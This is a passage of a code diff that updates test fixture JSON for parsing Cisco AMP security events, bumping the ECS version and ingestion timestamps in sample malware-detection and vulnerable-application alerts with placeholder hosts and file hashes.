malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}", "kind": "alert", "start": "2021-01-15T10:22:29.000Z", @@ -1710,7 +1710,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1742,7 +1742,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469647897Z", + "ingested": "2021-09-13T18:06:41.546121122Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1799,7 +1799,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1827,7 +1827,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469649781Z", + "ingested": "2021-09-13T18:06:41.546123192Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1884,7 +1884,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1912,7 +1912,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469651657Z", + "ingested": "2021-09-13T18:06:41.546125243Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1969,7 +1969,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2001,7 +2001,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469653537Z", + "ingested": "2021-09-13T18:06:41.546127347Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2058,7 +2058,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2090,7 +2090,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469655428Z", + "ingested": "2021-09-13T18:06:41.546129388Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2147,7 +2147,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2175,7 +2175,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469657309Z", + "ingested": "2021-09-13T18:06:41.546131467Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2232,7 +2232,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2260,7 +2260,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469659269Z", + "ingested": "2021-09-13T18:06:41.546133663Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2319,7 +2319,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2339,7 +2339,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:31:04.469661163Z", + "ingested": "2021-09-13T18:06:41.546135710Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", "kind": "alert", "start": "2021-01-15T10:20:00.000Z", @@ -2410,7 +2410,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2442,7 +2442,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469663071Z", + "ingested": "2021-09-13T18:06:41.546137800Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2499,7 +2499,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2527,7 +2527,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469664950Z", + "ingested": "2021-09-13T18:06:41.546139831Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2584,7 +2584,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2612,7 +2612,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469666839Z", + "ingested": "2021-09-13T18:06:41.546141890Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2669,7 +2669,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2701,7 +2701,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469668742Z", + "ingested": "2021-09-13T18:06:41.546143930Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2758,7 +2758,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2786,7 +2786,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469670637Z", + "ingested": "2021-09-13T18:06:41.546145982Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2843,7 +2843,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2871,7 +2871,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469672538Z", + "ingested": "2021-09-13T18:06:41.546148086Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2928,7 +2928,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2950,7 +2950,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469674438Z", + "ingested": "2021-09-13T18:06:41.546150194Z", "original": 